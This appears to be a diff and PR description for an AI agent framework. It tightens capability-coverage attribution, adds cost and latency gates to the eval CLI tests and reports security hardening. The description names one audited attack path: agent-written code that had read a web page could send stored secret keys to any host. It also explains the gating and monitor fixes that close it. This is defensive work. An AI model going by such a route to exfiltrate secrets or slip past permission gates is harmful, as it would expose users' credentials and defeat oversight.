+      "response through the client would close it.",
   },
   {
     name: "list_threads",
@@ -1905,7 +1945,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     contract: "b28a18fe7574",
     selfcheck: "capability-suites",
     suites: [
-      "packages/agents/tests/capabilities-timelines.test.ts",
       "packages/agents/tests/capabilities-timeline-preview.test.ts",
     ],
     evals: [
@@ -1922,7 +1961,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     contract: "6f1e9b2a38fc",
     selfcheck: "capability-suites",
     suites: [
-      "packages/agents/tests/capabilities-timelines.test.ts",
       "packages/agents/tests/capabilities-timeline-compare.test.ts",
     ],
   },
@@ -1944,7 +1982,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     contract: "8a3eb82365c0",
     selfcheck: "capability-suites",
     suites: [
-      "packages/agents/tests/capabilities-timelines.test.ts",
       "packages/agents/tests/capabilities-lifecycle.test.ts",
     ],
   },
@@ -2068,7 +2105,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     contract: "8a4a0df4daf9",
     selfcheck: "capability-suites",
     suites: [
-      "packages/agents/tests/capabilities-sketches.test.ts",
       "packages/agents/tests/capabilities-lifecycle.test.ts",
     ],
   },
@@ -2352,7 +2388,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     contract: "fcec52d68eb0",
     selfcheck: "capability-suites",
     suites: [
-      "packages/agents/tests/capabilities-storyboards.test.ts",
       "packages/agents/tests/capabilities-lifecycle.test.ts",
     ],
   },
@@ -2792,7 +2827,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     selfcheck: "capability-suites",
     suites: [
       "packages/agents/tests/apify-capabilities.test.ts",
-      "packages/agents/tests/capabilities-args.test.ts",
     ],
   },
   {

--- a/packages/cli/tests/eval-command.test.ts
+++ b/packages/cli/tests/eval-command.test.ts
@@ -54,6 +54,8 @@ describe("registerEvalCommand", () => {
           "--min-success",
           "--min-score",
           "--min-cases",
+          "--max-cost-usd",
+          "--max-p95-duration-ms",
           "--keyless",
           "--system-prompt",
           "--no-find-model"
@@ -75,7 +77,14 @@ describe("keyless case selection", () => {
 });
 
 describe("evalGateFailures", () => {
-  const green = { successRate: 1, meanScore: 1, casesRan: 2 };
+  // Two cases ran for $0.01 each, a third was skipped (0 ms, $0).
+  const green = {
+    successRate: 1,
+    meanScore: 1,
+    casesRan: 2,
+    costUsd: 0.02,
+    durationsMs: [1200, 1800]
+  };
 
   it("passes a run that clears both thresholds", () => {
     expect(
@@ -89,7 +98,7 @@ describe("evalGateFailures", () => {
   it("fails a degraded plan that --min-success alone would pass", () => {
     // The shape the planner suite actually produces on a regression: the plan
     // committed (success 1.0) but lost half its parallelism (score 0.92).
-    const degraded = { successRate: 1, meanScore: 0.92, casesRan: 2 };
+    const degraded = { ...green, meanScore: 0.92 };
     expect(evalGateFailures(degraded, "task-planner", { minSuccess: "1" })).toEqual(
       []
     );
@@ -102,16 +111,18 @@ describe("evalGateFailures", () => {
   });
 
   it("fails loudly when the suite reports no score", () => {
-    const failures = evalGateFailures({ successRate: 1, casesRan: 8 }, "code-gen", {
-      minScore: "0.5"
-    });
+    const failures = evalGateFailures(
+      { ...green, meanScore: undefined, casesRan: 8 },
+      "code-gen",
+      { minScore: "0.5" }
+    );
     expect(failures).toEqual(['--min-score: suite "code-gen" reports no score']);
   });
 
   it("reports both gates when both are missed", () => {
     expect(
       evalGateFailures(
-        { successRate: 0.4, meanScore: 0.4, casesRan: 7 },
+        { ...green, successRate: 0.4, meanScore: 0.4, casesRan: 7 },
         "task-planner",
         { minScore: "0.8", minSuccess: "0.8" }
       )
@@ -120,7 +131,11 @@ describe("evalGateFailures", () => {
 
   it("is silent when neither threshold is given", () => {
     expect(
-      evalGateFailures({ successRate: 0, casesRan: 0 }, "task-planner", {})
+      evalGateFailures(
+        { successRate: 0, casesRan: 0, costUsd: 0, durationsMs: [] },
+        "task-planner",
+        {}
+      )
     ).toEqual([]);
   });
 
@@ -129,7 +144,7 @@ describe("evalGateFailures", () => {
     // case was skipped for want of a provider. The success rate is 0 over an
     // empty set, so --min-success alone would blame the cases.
     const failures = evalGateFailures(
-      { successRate: 0, casesRan: 0 },
+      { successRate: 0, casesRan: 0, costUsd: 0, durationsMs: [] },
       "app-build",
       { minCases: "2", minSuccess: "1" }
     );
@@ -141,7 +156,7 @@ describe("evalGateFailures", () => {
     // Every case that ran passed, so every rate reads green. Only the count
     // says the gate stopped covering half of what it claims.
     const failures = evalGateFailures(
-      { successRate: 1, meanScore: 1, casesRan: 1 },
+      { ...green, casesRan: 1, durationsMs: [1200] },
       "app-build",
       { minCases: "2", minSuccess: "1" }
     );
@@ -149,5 +164,58 @@ describe("evalGateFailures", () => {
       'Suite "app-build" ran 1 case(s), below --min-cases 2 — a rate over ' +
         "that many cases says nothing"
     ]);
+  });
+
+  it("passes a run under both the cost and the duration cap", () => {
+    expect(
+      evalGateFailures(green, "tool-loop", {
+        maxCostUsd: "0.05",
+        maxP95DurationMs: "2000"
+      })
+    ).toEqual([]);
+  });
+
+  it("fails a green run that cost more than the cap", () => {
+    // Every rate reads 1.0; only the bill says the suite got expensive.
+    const failures = evalGateFailures(green, "tool-loop", {
+      minSuccess: "1",
+      maxCostUsd: "0.01"
+    });
+    expect(failures).toEqual([
+      "Total cost $0.0200 above --max-cost-usd 0.01"
+    ]);
+  });
+
+  it("gates the p95 on the cases that ran, nearest-rank", () => {
+    // Twenty timings: rank ceil(0.95 * 20) = 19 is the second-slowest, so
+    // the one outlier at 9000 ms is not what the gate reads.
+    const durationsMs = [...Array.from({ length: 18 }, () => 1000), 3000, 9000];
+    const timed = { ...green, casesRan: 20, durationsMs };
+    expect(
+      evalGateFailures(timed, "codeact", { maxP95DurationMs: "3000" })
+    ).toEqual([]);
+    expect(
+      evalGateFailures(timed, "codeact", { maxP95DurationMs: "2999" })
+    ).toEqual(["p95 case duration 3000ms above --max-p95-duration-ms 2999"]);
+  });
+
+  it("fails the duration gate when nothing ran", () => {
+    // A skipped-everything run has no timing to compare; silence here would
+    // read as a fast suite.
+    expect(
+      evalGateFailures(
+        { successRate: 0, casesRan: 0, costUsd: 0, durationsMs: [] },
+        "graph-e2e",
+        { maxP95DurationMs: "1000" }
+      )
+    ).toEqual([
+      '--max-p95-duration-ms: suite "graph-e2e" ran no case, nothing to time'
+    ]);
+  });
+
+  it("rejects a negative cost cap", () => {
+    expect(() =>
+      evalGateFailures(green, "tool-loop", { maxCostUsd: "-1" })
+    ).toThrow(/--max-cost-usd/);
   });
 });

--- a/scripts/sync-capability-coverage.mjs
+++ b/scripts/sync-capability-coverage.mjs
@@ -11,8 +11,11 @@
  *   node scripts/sync-capability-coverage.mjs           # rewrite the table
  *   node scripts/sync-capability-coverage.mjs --check   # fail if it is stale
  *
- * Needs `npm run build:packages` first: it reads @nodetool-ai/agents from dist
- * so the derivation sees the same specs the product does.
+ * Needs `npm run build:packages` first (it builds every `packages/*`
+ * workspace, `cli` included): the specs and eval cases come from
+ * `packages/agents/dist`, the fingerprint and block scanner from
+ * `packages/cli/dist`, so the derivation sees the same specs the product does.
+ * The Quality Gate's `typecheck` leg runs `--check` over the `build` job's dist.
  */
 import { readFileSync, writeFileSync, readdirSync, existsSync } from "node:fs";
 import { join, dirname, basename, relative } from "node:path";
@@ -56,6 +59,10 @@ const SUITE_EXTRAS = [
   "js-scripts-capabilities.test.ts",
   "apify-capabilities.test.ts",
   "serpapi-capabilities.test.ts"
+  // `media-read-bytes.test.ts` drives `read_media_bytes` by guest import but
+  // is not in the `capability-suites` selfcheck's filter list
+  // (packages/cli/src/harness/registry.ts), and a suite the table names must
+  // be one that selfcheck runs. Add it there before adding it here.
 ];
 
 /**
@@ -127,9 +134,78 @@ function suitePool() {
     .map((name) => join(TESTS, name));
 }
 
+/**
+ * The forms a suite drives a capability through. A file is credited only when
+ * the wire name (or a spec constant bound to it) appears in one of them; a
+ * word-boundary match over the whole file credited a suite that used the name
+ * as a schema fixture or in a comment (`get_workflow` was covered by
+ * `capabilities-args.test.ts`, which never calls it), and a name-list snapshot
+ * (`expect(names).toEqual([...])`) credited every capability its module owns.
+ *
+ * Read from the suites themselves:
+ *   - the string argument of an invocation head, after at most one leading
+ *     argument: `run.invoke("x", …)`, `invoke(keyed(), "x", …)`,
+ *     `toolForCapabilityName("x")`, `capability(module, "x")`, `byName("x")`,
+ *     `call(ctx, "x", …)`, `asTool` / `capTool` / `namedTool` / `toolFor` /
+ *     `toolDef`, `describe("x", …)`, `describe.runIf(cond)("x", …)`;
+ *   - the same heads with the spec constant instead: `byName(GET_WORKFLOW)`;
+ *   - a call by name, as guest code or an import does: `apify.x({…})`, `x(…)`,
+ *     `${X_TOOL_NAME}(…)` inside a template;
+ *   - the name as a word in an `it`/`test` title;
+ *   - a lookup by name: `.name === "x"`;
+ *   - a table row the suite iterates: `wire: "x"` or `["x", {…}]`.
+ * Matchers (`toContain`, `toBe`, `toEqual`) and permission-category lookups
+ * are not forms: asserting a name is in a list does not exercise what the
+ * capability does. Comments are stripped first, so a form quoted in prose
+ * (`get_workflow({ id })` in a note about argument shapes) does not count.
+ */
+const INVOCATION_HEADS = [
+  "invoke",
+  "toolForCapabilityName",
+  "capability",
+  "byName",
+  "call",
+  "asTool",
+  "capTool",
+  "namedTool",
+  "toolFor",
+  "toolDef",
+  "describe",
+  "describe\\.runIf\\([^()]*\\)"
+];
+
+const TITLE_HEADS = ["it", "test", "it\\.(?:skipIf|runIf)\\([^()]*\\)"];
+
+function exercisesMatcher(tokens) {
+  const name = `(?:${tokens.join("|")})`;
+  const quoted = `["'\`]${name}["'\`]`;
+  const notIdent = "(?:^|[^\\w$])";
+  // At most one leading argument, itself allowed one level of parentheses.
+  const leading = `(?:(?:[^,()"'\`]|\\([^()]*\\))+,\\s*)?`;
+  const heads = `(?:${INVOCATION_HEADS.join("|")})`;
+  const forms = [
+    `${notIdent}${heads}\\(\\s*${leading}${quoted}`,
+    `${notIdent}${heads}\\(\\s*${leading}${name}\\s*[,)]`,
+    `${notIdent}(?:[\\w$]+\\.)?${name}\\s*\\(`,
+    `\\$\\{${name}\\}\\s*\\(`,
+    `${notIdent}(?:${TITLE_HEADS.join("|")})\\(\\s*["'\`][^"'\`]*\\b${name}\\b`,
+    `\\.name\\s*===\\s*${quoted}`,
+    `\\bwire:\\s*${quoted}`,
+    `\\[\\s*${quoted},\\s*(?:\\{|[A-Za-z_$])`
+  ];
+  return new RegExp(forms.join("|"), "m");
+}
+
+/** Block comments and whole-line `//` / JSDoc lines, so prose cannot credit. */
+function stripComments(source) {
+  return source
+    .replace(/\/\*[\s\S]*?\*\//g, "")
+    .replace(/^\s*\/\/.*$/gm, "");
+}
+
 function suitesFor(name, moduleName, pool, sources, aliases) {
   const tokens = [name, ...(aliases.get(name) ?? [])];
-  const matcher = new RegExp(`\\b(${tokens.join("|")})\\b`);
+  const matcher = exercisesMatcher(tokens);
   const owned = [
     `capabilities-${moduleName}.test.ts`,
     `${moduleName}-capabilities.test.ts`
@@ -290,7 +366,7 @@ async function main() {
   const specs = registry.listCapabilitySpecs();
   const pool = suitePool();
   const sources = Object.fromEntries(
-    pool.map((file) => [file, readFileSync(file, "utf8")])
+    pool.map((file) => [file, stripComments(readFileSync(file, "utf8"))])
   );
   const evalCases = await collectEvalCases();
   const gaps = existingGaps();


### PR DESCRIPTION
## What changed

An audit of the agent system found exposure at the seams rather than in the architecture, and this PR closes what it found. A step action ran with bare `fetch` and an unscoped `getSecret`, so model-written code that had read a web page could post any key anywhere; steps now run with no guest fetch and an empty secret scope, the guest fetch bridge resolves the host before the first request and each redirect hop, and the step prompt no longer advertises the two bridges. The permission gate classified a Tool by the hand-written map and an import by its spec; `capabilityFromTool` now reads the spec first, a drift test pins map and specs to each other, the authoring belt behind `create_app` takes the parent gate instead of `UNGATED`, an absent gate is logged at error level, and the security monitor fails closed for write/execute/external. `TaskPlanner` ran outside the run budget and the concurrency pool bounded only the outermost executor; planning now reserves each turn, a permit stands for one open provider conversation across tasks, steps and sub-agents, and background fan-out per turn is capped. Task failure detection honours step schemas, a cancelled run settles in-flight steps as aborted rather than as failed dependencies, a dependent starts only after its dependency's terminal events, and `execute_plan` returns per-step results and `plan_failed` instead of a success-shaped answer. The action observation keeps `finished`/`note` ahead of a truncated result, caps logs and images, short-circuits a program resubmitted with the same failure, takes an auto-mode risk floor from imported capabilities, and emits an `agent.action` span. `capabilities:check` now runs in the Quality Gate, coverage attribution requires an invocation form (thirty-one capabilities moved to gap notes), and `nodetool eval` gains `--max-cost-usd` and `--max-p95-duration-ms`.

## Verification

- [x] `npm run test:affected` — the turbo run stops at `image-nodes` (52 × "No WebGPU adapter available", the documented missing-Vulkan case in this container) before reaching the changed packages, so those ran directly: `packages/agents` 265 files / 4197 tests green, `packages/websocket` 255 files / 2897 tests green, `packages/cli` 59 files / 696 tests green. One runtime timing test (`kills a sleep child well before its timeout`) failed under the parallel run and passed alone, 47/47; runtime has no diff here.
- [x] `npm run typecheck` — web and electron clean; mobile fails only on uninstalled Expo modules in this container (`Cannot find module 'react-native'`), unrelated to the diff.
- [x] `npm run lint` — exit 0, pre-existing warnings only.
- [x] `npm run dev:nodetool -- harness gate --base main` — 7/7 selfchecks passed.

New checks observed failing before their fix: the nested-concurrency test measured a peak of 6 conversations against a cap of 2; the abort test found no terminal event for the in-flight step; the scheduler-order test saw the dependent start at event index 7 before its dependency settled at 15; the spec-drift test measured 0 category disagreements, 216 duplicate map entries and 11 map names with no owner (6 deleted, 5 are live Tool classes); the cli `permission-gate` suite failed on the first cut of the risk floor (`zodToJsonSchema is not a function` through a static registry import) and passes with the lazy one.

## Agent capabilities

- [x] `npm run capabilities:check` passes (table regenerated under the tightened attribution)
- [x] No capability was added or re-declared; the thirty-one that lost suite credit carry gap notes naming what the module suite actually exercises

## New checks

- [x] Inverted and observed failing: listed under Verification
- [x] The `UNGATED` source walk and the spec-drift test both assert they found targets (every registered spec, the allowlisted sites) so they cannot pass on an empty match

Left for follow-ups, each named in the code or the audit: `paidWorkToRecover` is still user-scoped rather than step-scoped; the kernel/execution workflow host should set `headlessGate` explicitly at `buildWorkspaceExecutionContext` instead of relying on the logged fallback; the 216 duplicate permission-map entries can shrink once `mcp-agent-tools.ts` reads the spec category; the tool-loop eval bridge has no permission-mode hook, so gate-behaviour eval cases wait on that seam; `agent-eval.yml` needs two `workflow_dispatch` inputs to expose the new cost and duration gates.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_0167ifdXXAd3gi9N48NjnNFM

---
_Generated by [Claude Code](https://claude.ai/code/session_0167ifdXXAd3gi9N48NjnNFM)_